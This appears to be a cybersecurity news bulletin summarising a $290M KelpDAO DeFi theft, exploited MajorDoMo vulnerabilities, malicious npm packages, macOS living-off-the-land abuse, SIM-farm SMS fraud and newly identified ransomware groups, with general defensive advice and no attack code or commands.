Cybersecurity Alert: $290M DeFi Heist, macOS Exploits, and Emerging Threats
In the ever-evolving landscape of cybersecurity, recent incidents underscore the persistent vulnerabilities and sophisticated tactics employed by malicious actors. This week’s ThreatsDay Bulletin highlights several critical developments that demand immediate attention and proactive measures.
State-Sponsored DeFi Breach
The decentralized finance (DeFi) sector has once again been targeted, with KelpDAO suffering a significant breach resulting in the loss of $290 million. Investigations suggest that the North Korean-affiliated group, TraderTraitor, orchestrated this attack. The perpetrators exploited vulnerabilities within LayerZero’s infrastructure, specifically compromising two Remote Procedure Call (RPC) nodes and launching a Distributed Denial-of-Service (DDoS) attack on a third. This multi-faceted assault allowed them to manipulate downstream RPC infrastructure, leading to unauthorized fund transfers. In response, the Arbitrum Security Council has frozen approximately 30,766 ETH linked to the exploit. This incident echoes previous attacks attributed to TraderTraitor, including the $1.5 billion Bybit hack in early 2025 and the $285 million theft from the Drift Protocol.
Active Exploitation of MajorDoMo Vulnerabilities
VulnCheck has identified active exploitation attempts targeting two critical vulnerabilities in MajorDoMo, a widely used smart home automation platform. The first, CVE-2026-27175, is a command injection flaw that attackers have been exploiting since April 13 to deploy persistent PHP webshells, granting them continuous backdoor access. The second, CVE-2026-27174, allows unauthenticated remote code execution via the PHP console in the admin panel, with exploitation attempts detected from April 18. These vulnerabilities highlight the pressing need for users to apply patches promptly and monitor their systems for signs of compromise.
Surge in Malicious npm Packages
The npm registry has recently been infiltrated by several malicious packages designed to steal sensitive data, conduct system reconnaissance, and implant SSH backdoors. Notable among these are:
– `ixpresso-core`
– `forge-jsx`
– `@genoma-ui/components`, `@needl-ai/common`, `rrweb-v1`
– `cjs-biginteger`, `sjs-biginteger`, `bjs-biginteger`
– `@fairwords/websocket`, `@fairwords/loopback-connector-es`, `@fairwords/encryption`
– `js-logger-pack`
– `@kindo/selfbot`
Developers are urged to scrutinize dependencies, verify the integrity of packages before integration, and stay vigilant against supply chain attacks that can compromise entire ecosystems.
macOS Living-off-the-Land (LotL) Abuse
Security researchers have uncovered instances where attackers are leveraging native macOS utilities to execute malicious activities, a technique known as Living-off-the-Land (LotL). By abusing legitimate tools, such as `osascript` and `curl`, adversaries can evade detection, maintain persistence, and execute arbitrary commands without triggering traditional security alerts. This method underscores the importance of monitoring legitimate tool usage for anomalous behavior and implementing behavioral analytics to detect such stealthy attacks.
ProxySmart SIM Farms and SMS Fraud
A recent investigation has exposed the operation of ProxySmart SIM farms, which are being exploited to facilitate large-scale SMS fraud. These farms consist of numerous SIM cards managed remotely to send bulk messages, often used in phishing campaigns, spam distribution, and bypassing SMS-based authentication mechanisms. The existence of such operations highlights the need for enhanced monitoring of SMS traffic, the adoption of multi-factor authentication methods beyond SMS, and the implementation of robust anti-fraud measures by telecom providers.
Emergence of New Threat Actors
The cybersecurity community has identified several new hacktivist, data extortion, and ransomware groups, including:
– Harakat Ashab al-Yamin al-Islamia
– World Leaks
– Lamashtu
– Payouts King
– BravoX
– Black Shrantac
– NBLOCK
– Ndm448
– Chip
– Ransoomed
– Zollo
The proliferation of these groups indicates a growing trend of cybercriminals forming specialized factions to target specific industries and regions. Organizations must stay informed about emerging threats, share intelligence with peers, and adopt a proactive stance in threat detection and response.
Persistent Exploitation of Known Vulnerabilities
Despite the availability of patches and mitigations, attackers continue to exploit longstanding vulnerabilities. This persistence suggests that many organizations are neglecting basic security hygiene practices, such as timely patching, thorough vetting of third-party components, and limiting trust in external inputs. The cybersecurity community emphasizes the importance of adhering to fundamental security measures to prevent avoidable breaches and minimize the attack surface.
Conclusion
The recent spate of cyber incidents serves as a stark reminder of the dynamic and persistent nature of cyber threats. Organizations and individuals alike must prioritize cybersecurity by implementing robust defenses, staying informed about emerging threats, and fostering a culture of vigilance. By addressing known vulnerabilities, scrutinizing supply chain components, and monitoring for anomalous activities, the risk of compromise can be significantly reduced.
